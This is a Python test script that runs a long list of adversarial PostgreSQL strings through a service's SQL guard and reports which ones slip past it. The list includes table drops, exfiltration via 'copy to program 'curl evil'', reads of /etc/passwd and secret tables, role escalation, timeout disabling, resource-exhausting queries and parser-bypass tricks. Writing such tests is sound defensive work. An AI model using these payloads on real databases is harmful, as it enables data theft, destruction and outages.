"""Part A: adversarial SQL strings fed straight to sql_guard.check() (offline, no DB, no model)."""
import json
import sys
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from service.sql_guard import check, UnsafeSQL  # noqa: E402

CASES = [
    # --- stacked statements / comment tricks
    ("stack", "select 1 from hq.hospitals;;drop table hq.hospitals"),
    ("stack", "select name from hq.measures; -- ; delete from hq.hospitals"),
    ("stack", "select facility_name from hq.hospitals /* ; drop table x */"),
    ("stack", "select facility_name from hq.hospitals; "),
    ("stack", "select facility_name from hq.hospitals;\nselect 1"),
    ("stack", "/*!50000 select */ facility_name from hq.hospitals"),
    ("stack", "select facility_name from hq.hospitals where 1=1 --'; drop table hq.hospitals"),
    ("stack", "select $$;drop table hq.hospitals;$$ from hq.hospitals"),
    ("stack", "select facility_name from hq.hospitals\\; drop table hq.hospitals"),
    # --- writes in CTEs
    ("write", "with x as (delete from hq.hospitals returning *) select * from x"),
    ("write", "with x as (update hq.hospitals set state='XX' returning *) select * from x"),
    ("write", "with x as (insert into hq.hospitals(facility_id) values ('1') returning *) select * from x"),
    ("write", "with x as (select 1) insert into hq.hospitals(facility_id) select 'a' from x"),
    ("write", "select * from hq.hospitals where facility_id in (with d as (delete from hq.hospitals returning facility_id) select facility_id from d)"),
    ("write", "with recursive x as (select 1 union all select 1 from x) select * from x limit 1"),
    # --- into / copy / do / set
    ("into", "select facility_id into temp t from hq.hospitals"),
    ("into", "select facility_id into unlogged t2 from hq.hospitals"),
    ("into", "create temp table t as select * from hq.hospitals"),
    ("copy", "copy (select * from hq.hospitals) to program 'curl evil'"),
    ("copy", "copy hq.hospitals from stdin"),
    ("do", "do $$ begin delete from hq.hospitals; end $$"),
    ("do", "do language plpgsql $$ begin perform pg_sleep(100); end $$"),
    ("set", "set local statement_timeout = 0"),
    ("set", "set role postgres"),
    ("set", "set session authorization postgres"),
    ("set", "reset statement_timeout"),
    ("set", "show statement_timeout"),
    ("set", "select set_config('statement_timeout','0',false)"),
    ("set", "select SET_CONFIG('statement_timeout','0',false)"),
    ("set", "select current_setting('statement_timeout')"),
    ("set", "select hq.set_config('x','y',false)"),
    ("set", "select public.set_config('x','y',false)"),
    ("set", "select \"set_config\"('statement_timeout','0',false)"),
    ("set", "select current_user, session_user, current_database(), version(), current_schema()"),
    ("set", "select inet_server_addr(), inet_server_port(), current_catalog"),
    ("set", "select txid_current()"),
    ("set", "select to_regclass('hq_app.request_log')"),
    ("set", "select has_table_privilege('hq_app.request_log','select')"),
    ("set", "select current_query()"),
    # --- dangerous functions
    ("func", "select pg_sleep(10)"),
    ("func", "select PG_SLEEP(10)"),
    ("func", "select pg_catalog.pg_sleep(10)"),
    ("func", "select \"pg_sleep\"(10)"),
    ("func", "select 1 where exists (select pg_sleep(10))"),
    ("func", "select facility_id from hq.hospitals where pg_sleep(1) is not null"),
    ("func", "select pg_read_file('/etc/passwd')"),
    ("func", "select pg_ls_dir('.')"),
    ("func", "select lo_import('/etc/passwd')"),
    ("func", "select lo_get(16384)"),
    ("func", "select lo_from_bytea(0, 'abc')"),
    ("func", "select * from dblink('host=x','select 1') as t(a int)"),
    ("func", "select dblink_connect('host=x')"),
    ("func", "select query_to_xml('select * from hq_app.request_log', true, false, '')"),
    ("func", "select table_to_xml('hq_app.request_log', true, false, '')"),
    ("func", "select schema_to_xml('hq_app', true, false, '')"),
    ("func", "select database_to_xml(true, false, '')"),
    ("func", "select query_to_xml_and_xmlschema('select 1', true, false, '')"),
    ("func", "select pg_terminate_backend(1)"),
    ("func", "select pg_cancel_backend(1)"),
    ("func", "select pg_advisory_lock(1)"),
    ("func", "select pg_try_advisory_lock(1)"),
    ("func", "select pg_advisory_xact_lock(1)"),
    ("func", "select pg_notify('a','b')"),
    ("func", "select pg_backend_pid()"),
    ("func", "select pg_stat_get_activity(null)"),
    ("func", "select * from pg_stat_activity"),
    ("func", "select * from pg_roles"),
    ("func", "select * from pg_settings"),
    ("func", "select pg_ls_dir('/')"),
    ("func", "select pg_relation_filepath('hq.hospitals')"),
    ("func", "select pg_size_pretty(1)"),
    ("func", "select pg_typeof(1)"),
    ("func", "select xmlelement(name x, 'a')"),
    ("func", "select ts_debug('english','a')"),
    ("func", "select row_to_json(h) from hq.hospitals h"),
    ("func", "select current_setting('is_superuser')"),
    ("func", "select CURRENT_SETTING('x')"),
    ("func", "select cursor_to_xml('c', 1, true, false, '')"),
    # --- other schemas / tables
    ("schema", "select * from hq_app.request_log"),
    ("schema", "select * from HQ_APP.REQUEST_LOG"),
    ("schema", "select * from \"hq_app\".\"request_log\""),
    ("schema", "select * from hq_docs.chunks"),
    ("schema", "select * from request_log"),
    ("schema", "select * from chunks"),
    ("schema", "select * from information_schema.tables"),
    ("schema", "select * from INFORMATION_SCHEMA.columns"),
    ("schema", "select * from pg_catalog.pg_roles"),
    ("schema", "select * from pg_roles"),
    ("schema", "select * from pg_class"),
    ("schema", "select * from auth.users"),
    ("schema", "select * from vault.secrets"),
    ("schema", "select * from vault.decrypted_secrets"),
    ("schema", "select * from storage.objects"),
    ("schema", "select * from extensions.pg_stat_statements"),
    ("schema", "select * from public.hospitals"),
    ("schema", "select * from hq.\"Hospitals\""),
    ("schema", "select * from HQ.HOSPITALS"),
    ("schema", "select * from \"hq\".\"hospitals\""),
    ("schema", "select * from \"HQ\".\"hospitals\""),
    ("schema", "select * from hq.hospitals_secret"),
    ("schema", "select * from hq.pg_class"),
    ("schema", "select * from hq.hospitals h, hq_app.request_log r"),
    ("schema", "select * from hq.hospitals where facility_id in (select question from hq_app.request_log)"),
    ("schema", "select (select question from hq_app.request_log limit 1)"),
    ("schema", "select * from hq.hospitals h, lateral (select * from hq_app.request_log r) x"),
    ("schema", "select name from hq.measures union select question from hq_app.request_log"),
    ("schema", "select name from hq.measures intersect select question from hq_app.request_log"),
    ("schema", "select name from hq.measures except select question from hq_app.request_log"),
    ("schema", "select coalesce((select 1 from hq_docs.chunks limit 1), 0)"),
    ("schema", "select * from hq.hospitals where exists (select 1 from hq_docs.chunks)"),
    ("schema", "with a as (select * from hq_app.request_log) select * from a"),
    ("schema", "with hospitals as (select * from hq_app.request_log) select * from hospitals"),
    ("schema", "with request_log as (select 1 as x) select * from request_log"),
    ("schema", "with recursive hospitals as (select * from hospitals) select * from hospitals"),
    ("schema", "select * from hq.hospitals where facility_id = any(array(select question from hq_app.request_log))"),
    ("schema", "select array(select question from hq_app.request_log)"),
    ("schema", "select * from table(hq_app.request_log)"),
    ("schema", "table hq.hospitals"),
    ("schema", "table hq_app.request_log"),
    ("schema", "values (1),(2)"),
    ("schema", "select * from (values (1),(2)) v"),
    ("schema", "select * from hq.hospitals natural join hq_app.request_log"),
    ("schema", "select * from only hq.hospitals"),
    ("schema", "select * from hq.hospitals tablesample system (50)"),
    ("schema", "select * from hq.hospitals h join lateral (select question from hq_app.request_log) r on true"),
    ("schema", "select * from rows from (generate_series(1,3))"),
    ("schema", "select * from hq.hospitals where facility_id::regclass is null"),
    ("schema", "select 'hq_app.request_log'::regclass"),
    ("schema", "select * from ｈq.hospitals"),          # fullwidth h
    ("schema", "select * from hq.hоspitals"),           # cyrillic o
    ("schema", "select * from hq .hospitals"),
    ("schema", "select * from hq. /*x*/ hospitals"),
    ("schema", "select * from hq.hospitals, unnest(array[1,2]) u"),
    ("schema", "select * from json_to_recordset('[{\"a\":1}]') as x(a int)"),
    ("schema", "select * from jsonb_each('{}'::jsonb)"),
    ("schema", "select * from regexp_matches('a','a')"),
    ("schema", "select * from pg_ls_dir('/')"),
    ("schema", "select * from pg_catalog.pg_ls_dir('/')"),
    ("schema", "select * from generate_series(1,10)"),
    ("schema", "select * from public.generate_series(1,10)"),
    ("schema", "select * from dblink('a','b') t(x int)"),
    ("schema", "select * from query_to_xml('select 1', true, false, '') "),
    # --- blowups
    ("blow", "select count(*) from generate_series(1,1000000000)"),
    ("blow", "select * from generate_series(1,1000000000)"),
    ("blow", "select count(*) from generate_series(1,100000000) a, generate_series(1,100000000) b"),
    ("blow", "select count(*) from hq.measure_values a, hq.measure_values b"),
    ("blow", "select count(*) from hq.measure_values a, hq.measure_values b, hq.measure_values c"),
    ("blow", "with recursive r(n) as (select 1 union all select n+1 from r) select count(*) from r"),
    ("blow", "with recursive r(n) as (select 1 union all select n+1 from r) select n from r limit 100"),
    ("blow", "select facility_id from hq.hospitals a cross join hq.hospitals b cross join hq.hospitals c cross join hq.hospitals d"),
    ("blow", "select repeat('x', 100000000)"),
    ("blow", "select repeat('x', 2000000000)"),
    ("blow", "select * from hq.hospitals where facility_name ~ '(a+)+$'"),
    ("blow", "select md5(repeat('a', 500000000))"),
    ("blow", "select string_agg(facility_name, ',') from hq.measure_values a join hq.hospitals using (facility_id)"),
    ("blow", "select array_agg(m.*) from hq.measure_values m"),
    ("blow", "select lpad('x', 1000000000, 'y')"),
    ("blow", "select 'x' || repeat('y',1000000000)"),
    # --- locks / explain
    ("lock", "select * from hq.hospitals for update"),
    ("lock", "select * from hq.hospitals for share"),
    ("lock", "select * from hq.hospitals for no key update skip locked"),
    ("lock", "select * from hq.hospitals for key share nowait"),
    ("lock", "lock table hq.hospitals"),
    ("lock", "explain analyze select * from hq.hospitals"),
    ("lock", "explain analyze delete from hq.hospitals"),
    ("lock", "explain (analyze, verbose) select * from hq.hospitals"),
    ("lock", "analyze hq.hospitals"),
    ("lock", "vacuum hq.hospitals"),
    ("lock", "refresh materialized view hq.v_scorecard"),
    ("lock", "begin"),
    ("lock", "commit"),
    ("lock", "prepare p as select 1"),
    ("lock", "execute p"),
    ("lock", "call pg_sleep(1)"),
    ("lock", "listen x"),
    ("lock", "notify x"),
    ("lock", "discard all"),
    ("lock", "declare c cursor for select 1"),
    ("lock", "fetch all from c"),
    ("lock", "checkpoint"),
    ("lock", "load 'x'"),
    ("lock", "alter role hq_reader password 'x'"),
    ("lock", "grant select on hq.hospitals to public"),
    ("lock", "truncate hq.hospitals"),
    ("lock", "comment on table hq.hospitals is 'x'"),
    ("lock", "create function f() returns int as 'select 1' language sql"),
    # --- row-limit evasion
    ("limit", "select facility_id from hq.hospitals limit all"),
    ("limit", "select facility_id from hq.hospitals limit 1000000 offset 0"),
    ("limit", "select facility_id from hq.hospitals limit null"),
    ("limit", "select facility_id from hq.hospitals fetch first 100000 rows only"),
    ("limit", "select facility_id from hq.hospitals offset 5 rows fetch first 5000 rows only"),
    ("limit", "select facility_id from hq.hospitals limit 10 + 100000"),
    ("limit", "select facility_id from hq.hospitals limit (select 100000)"),
    ("limit", "select facility_id from hq.hospitals limit 1e6"),
    ("limit", "select facility_id from hq.hospitals limit 0x10"),
    ("limit", "select facility_id from hq.hospitals limit -1"),
    ("limit", "(select facility_id from hq.hospitals limit 5) union all (select facility_id from hq.hospitals limit 5000)"),
    ("limit", "select facility_id from hq.hospitals union all select facility_id from hq.hospitals limit 99999"),
    ("limit", "select * from (select facility_id from hq.hospitals) s limit 5"),
    ("limit", "select facility_id from hq.hospitals order by 1 limit 5 offset 100000000"),
    ("limit", "select facility_id from hq.hospitals limit 200"),
    ("limit", "select facility_id from hq.hospitals limit 201"),
    ("limit", "select facility_id from hq.hospitals limit 0"),
    ("limit", "select facility_id from hq.hospitals order by random()"),
    # --- unicode / odd tokens
    ("odd", "select facility_id from hq.hospitals"),
    ("odd", "select facility_id from hq.hospitals​; drop table hq.hospitals"),
    ("odd", "select facility_id from hq.hospitals where facility_name = U&'\\0041'"),
    ("odd", "select E'\\x41' from hq.hospitals"),
    ("odd", "select * from hq.hospitals where facility_id = $tag$x$tag$"),
    ("odd", "SELECT * FROM hq.hospitals WHERE facility_name = 'a'' or 1=1 --'"),
    ("odd", "select facility_id from hq.hospitals where facility_name ilike '%o''brien%'"),
    ("odd", "select 1"),
    ("odd", "select 'a'"),
    ("odd", "select now()"),
    ("odd", "select unnest(array[1,2,3])"),
    ("odd", "select facility_name::text::regclass from hq.hospitals"),
    ("odd", "select * from hq.hospitals h where h.facility_id::text = (select current_user)"),
    ("odd", "select null"),
    ("odd", "select ('x' collate \"C\")"),
    ("odd", "select * from hq.hospitals where facility_id = (select pg_catalog.current_setting('x'))"),
    ("odd", "select * from hq.hospitals where facility_id = (select pg_catalog.set_config('x','y',false))"),
    ("odd", "select * from hq.hospitals h where (select count(*) from hq.measure_values) > 0"),
    ("odd", "select user"),
    ("odd", "select * from hq.hospitals where facility_id = any (select facility_id from hq.measure_values)"),
    ("odd", "select (select facility_id from hq.hospitals limit 1)"),
    ("odd", "select pg_ls_dir"),
    ("odd", "select * from (select pg_read_file('x')) s"),
    ("odd", "select * from hq.hospitals a where exists (select 1 from hq.measure_values b where b.facility_id=a.facility_id)"),
    ("odd", "select \"pg_read_file\"('/etc/passwd')"),
    ("odd", "select (pg_read_file)('/etc/passwd')"),
    ("odd", "select hq.pg_read_file('/etc/passwd')"),
    ("odd", "select public.pg_read_file('/etc/passwd')"),
    ("odd", "select \"hq\".\"pg_read_file\"('/etc/passwd')"),
    ("odd", "select pg_read_binary_file('/etc/passwd')"),
    ("odd", "select lo_export(1,'/tmp/x')"),
    ("odd", "select lo_unlink(1)"),
    ("odd", "select loread(1,1)"),
    ("odd", "select lowrite(1,'a')"),
    ("odd", "select * from hq.hospitals where facility_id = ''; select 1"),
    # --- CTE-name shadowing: any CTE alias anywhere whitelists that bare name everywhere
    ("shadow", "select * from pg_roles, (with pg_roles as (select 1) select 1) s"),
    ("shadow", "with pg_roles as (select 1) select * from pg_roles"),
    ("shadow", "select * from pg_user where exists (with pg_user as (select 1) select 1 from pg_user)"),
    ("shadow", "select * from pg_settings, (with pg_settings as (select 1) select 1) s"),
    ("shadow", "select * from pg_stat_activity, (with pg_stat_activity as (select 1) select 1) s"),
    ("shadow", "select (with pg_roles as (select 1) select 1), rolname from pg_roles"),
    ("shadow", "select * from pg_authid, (with pg_authid as (select 1) select 1) s"),
    ("shadow", "select * from pg_shadow, (with pg_shadow as (select 1) select 1) s"),
    ("shadow", "select * from pg_class, (with pg_class as (select 1) select 1) s"),
    ("shadow", "select * from hq.hospitals, (with request_log as (select 1) select 1) s, request_log"),
    ("shadow", "select * from hq.hospitals, (with chunks as (select 1) select 1) s, chunks"),
    ("shadow", "select * from pg_roles"),
    ("shadow", "select * from hq.hospitals h, (with a as (select 1) select * from a) x, auth.users"),
    # --- scalar-position set-returning functions (not a Table node)
    ("blow", "select generate_series(1,1000000000)"),
    ("blow", "select count(*) from (select generate_series(1,1000000000)) s"),
    ("blow", "select * from hq.hospitals where facility_id in (select unnest(array(select generate_series(1,100000000))))"),
    ("blow", "select string_agg(repeat('x',1000), ',') from (select generate_series(1,1000000)) s"),
]


def main():
    out = []
    for cat, sql in CASES:
        try:
            r = check(sql)
            out.append({"cat": cat, "sql": sql, "accepted": True, "rewritten": r})
        except UnsafeSQL as e:
            out.append({"cat": cat, "sql": sql, "accepted": False, "reason": str(e)})
        except Exception as e:  # noqa
            out.append({"cat": cat, "sql": sql, "accepted": None, "reason": f"UNEXPECTED {type(e).__name__}: {e}"})
    Path(__file__).with_name("part_a_results.json").write_text(json.dumps(out, indent=1, ensure_ascii=False), encoding="utf-8")
    acc = [o for o in out if o["accepted"]]
    print(len(out), "cases;", len(acc), "accepted;", sum(1 for o in out if o["accepted"] is None), "unexpected")
    for o in out:
        if o["accepted"] or o["accepted"] is None:
            print("ACCEPT" if o["accepted"] else "UNEXP", "|", o["cat"], "|", o["sql"][:110].replace("\n", " "), "=>", (o.get("rewritten") or o["reason"])[:150].replace("\n", " "))


main()
